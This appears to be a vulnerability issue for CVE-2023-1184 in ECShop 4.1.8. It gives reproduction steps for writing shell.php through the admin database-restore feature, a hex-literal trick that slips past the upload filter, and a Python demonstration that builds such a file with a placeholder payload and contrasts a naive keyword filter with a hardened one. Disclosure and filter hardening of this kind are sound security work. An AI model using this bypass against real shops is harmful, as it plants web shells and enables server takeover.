CVE-2023-1184: ecshop v4.1.8 RCE vulnerability · Issue #1 · wjzdalao/ecshop4.1.8
A vulnerability, which was classified as problematic, has been found in ECshop up to 4.1.8. Affected by this issue is some unknown functionality of the file admin/database.php of the component Backup Database Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222356.
ECSHOP 4.1.8 Code Execution Vulnerability
Reproduction environment: download the source code and build a local environment for source-code auditing.
Vulnerability reproduction:
After the environment is built, visit http://domain/admin and log in to the website back end with an ECShop administrator account.
Under Database -> Backup, create a backup of the database. Opening the resulting SQL file shows the format of its header and footer.
Using the same format, construct the statements we want the database to execute.
Once the file is constructed, go to Database -> Backup -> Restore backup, select the constructed SQL file and submit it.
At this point shell.php has been written to the target folder.
The key point is that admin/database.php filters the content of the uploaded SQL file, but the payload can still be inserted into a database table as a hexadecimal literal and then read back out of that table, which bypasses the filter.
After a successful upload, the statements are executed automatically.
Note also that '\r\n' is automatically replaced with '\n' when the SQL file is uploaded, after which the filter cannot be bypassed. Since the line ending on Windows is '\r\n', a file prepared on Windows must be converted to '\n' line endings manually.
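As an added illustration (not code from this issue or from ECShop itself), the following Python script shows why a plaintext keyword check over the uploaded SQL file is defeated by hex-encoding the payload, and shows the corresponding hardened check that decodes MySQL 0x... literals before filtering. It also normalizes line endings to '\n' as the restore step requires. The table and column names, the keyword list and the sample payload are assumptions made for illustration; the page does not say what admin/database.php actually filters, nor exactly how the staged row is turned into shell.php, so that final step is deliberately not modelled.

```python
import re

# Constructed sample payload. Assumption: the page does not show what it writes
# into shell.php, so this placeholder stands in for whatever the attacker stores.
SAMPLE_PAYLOAD = b"<?php /* placeholder */ ?>"

# The names below are assumptions for illustration, not ECShop's real schema
# or the real keyword list in admin/database.php.
STAGING_TABLE = "ecs_staging"
BLOCKED_KEYWORDS = ("<?php", "into outfile", "into dumpfile")


def normalize_line_endings(text: str) -> str:
    """Convert Windows (\\r\\n) and bare \\r line endings to \\n, the form the
    restore handler works with."""
    return text.replace("\r\n", "\n").replace("\r", "\n")


def to_hex_literal(data: bytes) -> str:
    """Encode raw bytes as a MySQL hexadecimal literal (0x...). The server
    decodes it back to the original bytes when the row is inserted."""
    return "0x" + data.hex()


def build_restore_sql(payload: bytes, table: str = STAGING_TABLE) -> str:
    """Build a restore file in the one-statement-per-line shape of a backup:
    create a staging table and insert the payload as a hex literal so the
    plaintext never appears in the uploaded file."""
    statements = [
        f"CREATE TABLE IF NOT EXISTS `{table}` (`data` LONGBLOB NOT NULL);",
        f"INSERT INTO `{table}` (`data`) VALUES ({to_hex_literal(payload)});",
    ]
    return normalize_line_endings("\n".join(statements) + "\n")


def naive_filter_blocks(sql: str) -> bool:
    """Models a plaintext keyword check over the uploaded file (an assumption
    about the style of check, not ECShop's code). True means 'reject'."""
    lowered = sql.lower()
    return any(keyword in lowered for keyword in BLOCKED_KEYWORDS)


_HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def expand_hex_literals(sql: str) -> str:
    """Replace every 0x... literal with the bytes it decodes to, so a keyword
    check sees what the database will actually store."""
    def _decode(match: re.Match) -> str:
        digits = match.group(1)
        if len(digits) % 2:          # odd digit count: MySQL pads on the left
            digits = "0" + digits
        return bytes.fromhex(digits).decode("latin-1")
    return _HEX_LITERAL.sub(_decode, sql)


def hardened_filter_blocks(sql: str) -> bool:
    """The same keyword check, applied after hex literals are decoded."""
    return naive_filter_blocks(expand_hex_literals(sql))


if __name__ == "__main__":
    dump = build_restore_sql(SAMPLE_PAYLOAD)
    print(dump)
    print("naive filter blocks it:   ", naive_filter_blocks(dump))
    print("hardened filter blocks it:", hardened_filter_blocks(dump))
```

Running it shows the generated file passing the plaintext check (the `<?php` tag only exists inside the 0x literal) and failing the hardened one. A file written on Windows should go through `normalize_line_endings` before upload, matching the line-ending caveat above.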